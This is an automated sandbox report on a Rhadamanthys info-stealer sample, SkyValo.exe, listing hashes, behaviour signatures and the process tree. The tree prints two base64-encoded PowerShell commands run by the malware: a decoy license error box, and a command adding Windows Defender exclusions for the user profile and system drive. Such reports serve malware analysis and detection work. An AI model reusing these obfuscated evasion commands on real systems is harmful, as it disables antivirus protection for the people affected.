Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
74s -
max time network
139s -
platform
windows10-1703_x64 -
resource
win10-20231023-en -
resource tags
-
submitted
23/10/2023, 22:34
General
-
Target
SkyValo.exe
-
Size
638KB
-
MD5
e73e141a15cadcc8ab8ec09d712c59b0
-
SHA1
bace5f12f6ff22a0f1afc12b5d772d6c44cc0e61
-
SHA256
a4704499fb314be36d560f009756f709d61c16f4627e9002d6f2ca08e048f6c1
-
SHA512
101b15b36ba97213575f713de30deeb1c9c7c089432dfaba32d608a8aadfd14b76d7db6aeed79a72af8a6ee0b62ae6ebae0953e9927770eee8d8b0d384ad3c30
-
SSDEEP
12288:PjOubH2seO0lXVrUy201HuEZA6PUifgDsqAhPSQIXY:PjOaWseO2XV4y2suEZ5PUygQhhPMXY
Malware Config
Signatures
-
Detect rhadamanthys stealer shellcode 4 IoCs
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 1 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Modifies Internet Explorer settings 1 TTPs 2 IoCs
-
Modifies registry class 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
-
Suspicious behavior: MapViewOfSection 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 8 IoCs
-
Suspicious use of SetWindowsHookEx 4 IoCs
-
Suspicious use of WriteProcessMemory 15 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\SkyValo.exe"C:\Users\Admin\AppData\Local\Temp\SkyValo.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHUAbQBlACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHUAbABmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcATgBvACAAbABpAGMAZQBuAHMAZQAgAGYAbwB1AG4AZAAuACAAUABsAGUAYQBzAGUAIABjAG8AbgBuAGUAYwB0ACAAdgBpAGEAIABzAHQAZQBhAG0AIAB0AG8AIABnAGUAdAAgAGEAIABsAGkAYwBlAG4AcwBlAC4AJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGQAcABxACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHEAagBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAbABzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAdABnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHEAcgBiACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\license.bat" "2⤵
- Checks computer location settings
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
18KB
MD57acad0587a8a25fc3e0e2dba4d64a897
SHA156ecf1981a991fe0fad24b72a9b5eccaea559042
SHA2563be70902b3a6d6eedea41b53194dfcda7cc72686fe68dc784962382d59a804c5
SHA5124637da7d9434604b85e60f5026984e008759e5401e8babfdc9d56c4a0bc62ff7a92f5dcd7ecbc5e19c46616dfac5ecba0c5d736fcc1ea93e326c21c37c929f15
-
Filesize
315KB
MD51b0017ad38a38625e73fd96142e0e53f
SHA1c0acdddc606f64f1cc86c3e47c690d0c76913c16
SHA256afc6af14a1609586d2f73c10c0558cfe4412db2044b2322383e9e4d731cdd63f
SHA512f87018636b62f1731c05d2ca8ed4c682456777d7d035d2372d724bf627c7aeb20bb486e4f2627ef126ead595570f9d7b345141ab11fb1ad1d4916fb37d773434
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
40B
MD50b667d11abcd8950cae485cf822220f4
SHA158e963d436ab5bf929766a6f59b7d21158edebd5
SHA25667ff64ecbd272ece61acd917e55bd965098853a8e341bc5468a272d476e229c5
SHA512ca279059b5e525375dbf6f6fb6b4699ed34c7b46ce208cc461dbcf18e2934343f33b7510a24367a890c78ce95536ffbaf3ebbd6f604c225cbacdd0d53193053c
-
Filesize
456KB
MD5515a0c8be21a5ba836e5687fc2d73333
SHA1c52be9d0d37ac1b8d6bc09860e68e9e0615255ab
SHA2569950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae
SHA5124e2bd7ce844bba25aff12e2607c4281b59f7579b9407139ef6136ef09282c7afac1c702adebc42f8bd7703fac047fd8b5add34df334bfc04d3518ea483225522
-
Filesize
456KB
MD5515a0c8be21a5ba836e5687fc2d73333
SHA1c52be9d0d37ac1b8d6bc09860e68e9e0615255ab
SHA2569950788284df125c7359aeb91435ed24d59359fac6a74ed73774ca31561cc7ae
SHA5124e2bd7ce844bba25aff12e2607c4281b59f7579b9407139ef6136ef09282c7afac1c702adebc42f8bd7703fac047fd8b5add34df334bfc04d3518ea483225522
-
Filesize
28KB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
4.0MB
-
Filesize
8KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
1024KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
8KB
-
Filesize
1024KB
-
Filesize
6.5MB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
300KB
-
Filesize
6.9MB
-
Filesize
112KB
-
Filesize
408KB
-
Filesize
104KB
-
Filesize
64KB
-
Filesize
472KB
-
Filesize
6.2MB
-
Filesize
6.9MB
-
Filesize
5.0MB
-
Filesize
64KB
-
Filesize
584KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
408KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
592KB
-
Filesize
660KB
-
Filesize
120KB
-
Filesize
300KB
-
Filesize
204KB
-
Filesize
64KB
-
Filesize
3.3MB
-
Filesize
136KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
104KB
-
Filesize
32KB
-
Filesize
64KB
-
Filesize
216KB
-
Filesize
6.9MB